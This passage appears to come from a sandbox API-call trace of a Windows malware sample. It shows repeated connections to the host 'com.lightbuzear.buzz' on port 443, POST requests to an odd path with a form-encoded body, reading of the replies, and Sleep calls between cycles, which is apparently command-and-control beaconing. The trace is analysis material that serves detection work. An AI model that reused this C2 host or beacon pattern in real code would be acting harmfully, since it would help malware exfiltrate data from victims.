(HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48005f0 [0262.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0262.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005f0 | out: hHeap=0x4780000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800708 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0262.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009b0 [0262.708] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0262.708] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0262.708] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0262.708] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0262.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009b0 | out: hHeap=0x4780000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0262.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0262.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0262.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0262.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0262.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0262.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0262.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0262.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800a00 [0262.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0262.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a00 | out: hHeap=0x4780000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800820 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0262.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48006b8 [0262.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0262.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0262.711] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0262.711] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0263.763] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48006b8 | out: hHeap=0x4780000) returned 1 [0263.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0263.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0263.764] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0263.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0263.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0263.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0263.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0263.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0263.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0263.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0263.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0263.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eac0 [0263.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0263.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0263.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800938 [0263.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0263.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800938 | out: hHeap=0x4780000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48006b8 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0263.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a50 [0263.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0263.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0263.766] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0263.766] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0263.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a50 | out: hHeap=0x4780000) returned 1 [0263.767] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0263.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0263.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0263.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0263.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0263.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0263.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0263.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0263.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0263.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eac0 [0263.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0263.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800668 [0263.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0263.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800668 | out: hHeap=0x4780000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a28 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0263.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008c0 [0263.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0263.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0263.769] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0263.769] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0263.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48008c0 | out: hHeap=0x4780000) returned 1 [0263.769] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0263.770] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0263.770] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0263.770] FreeLibrary (hLibModule=0x71570000) returned 1 [0263.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0263.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0263.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800780 | out: hHeap=0x4780000) returned 1 [0263.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800988 | out: hHeap=0x4780000) returned 1 [0263.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0263.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0263.771] Sleep (dwMilliseconds=0x2710) [0263.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0263.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0263.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0263.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0263.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0263.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0263.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eac0 [0263.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0263.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0263.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c50 [0263.788] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0263.789] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0263.789] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0263.789] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0263.789] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0263.789] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4720 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800280 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0263.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0263.790] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0263.791] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0263.791] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0263.791] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0263.802] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0263.802] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0263.802] FreeLibrary (hLibModule=0x71780000) returned 1 [0263.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0263.803] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0263.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800910 [0263.803] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0263.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0263.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0263.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0263.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0263.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0263.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0263.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0263.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0263.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0263.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0263.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eac0 [0263.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0263.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0263.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0263.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eac0 [0263.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0263.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0263.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0263.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005c8 [0263.804] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009b0 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0263.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0263.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0263.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0263.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0263.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0263.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0263.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f808 [0263.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800988 [0263.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800988 | out: hHeap=0x4780000) returned 1 [0263.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0263.806] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0263.807] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0263.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0263.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0263.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0263.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0263.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eee8 [0263.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef00 [0263.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eee8 | out: hHeap=0x4780000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0263.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef00 | out: hHeap=0x4780000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48005a0 [0263.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0263.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005a0 | out: hHeap=0x4780000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800730 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0263.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800780 [0263.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0263.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0263.820] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0263.821] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0263.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800780 | out: hHeap=0x4780000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0263.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0263.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0263.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0263.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0263.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0263.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eff0 [0263.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef90 [0263.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eff0 | out: hHeap=0x4780000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0263.822] HeapFree (in: 